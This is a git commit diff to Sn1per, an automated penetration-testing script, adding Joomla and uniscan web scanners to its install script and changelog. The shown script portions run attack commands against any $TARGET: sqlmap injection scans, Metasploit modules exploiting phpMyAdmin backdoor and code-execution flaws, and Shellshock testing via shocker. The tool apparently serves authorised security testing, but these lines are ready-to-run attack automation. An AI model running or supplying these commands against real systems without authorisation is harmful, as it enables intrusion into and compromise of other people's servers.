Sn1per by 1N3 @CrowdShield

This commit is contained in:
root
2016-05-06 08:24:02 -07:00
parent f59d65a4e9
commit 11b2022b26
3 changed files with 11 additions and 3 deletions

View File

@@ -48,6 +48,8 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
```
## CHANGELOG:
* v1.7 - Added uniscan web vulnerability scanner
* v1.7 - Added joomscan Joomla scanner
* v1.7 - Improved web scan performance
* v1.7 - Fixed issue with inurlbr output
* v1.7 - Added remote desktop viewing for RDP connections

View File

@@ -24,7 +24,7 @@ echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per insta
read answer
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
apt-get install joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
gem install rake

10
sniper
View File

@@ -487,9 +487,12 @@ else
dirb http://$TARGET
wpscan --url http://$TARGET --batch
wpscan --url http://$TARGET/wordpress/ --batch
joomscan -u http://$TARGET
joomscan -u http://$TARGET/joomla/
python $CMSMAP -t http://$TARGET
python $CMSMAP -t http://$TARGET/wordpress/
arachni http://$TARGET --output-only-positives
#arachni http://$TARGET --output-only-positives
uniscan -u http://$TARGET -qweds
sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80
@@ -633,9 +636,12 @@ else
dirb https://$TARGET
wpscan --url https://$TARGET --batch
wpscan --url https://$TARGET/wordpress/ --batch
joomscan -u https://$TARGET
joomscan -u https://$TARGET/joomla/
python $CMSMAP -t https://$TARGET
python $CMSMAP -t https://$TARGET/wordpress/
arachni https://$TARGET --output-only-positives
#arachni https://$TARGET --output-only-positives
uniscan -u https://$TARGET -qweds
sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl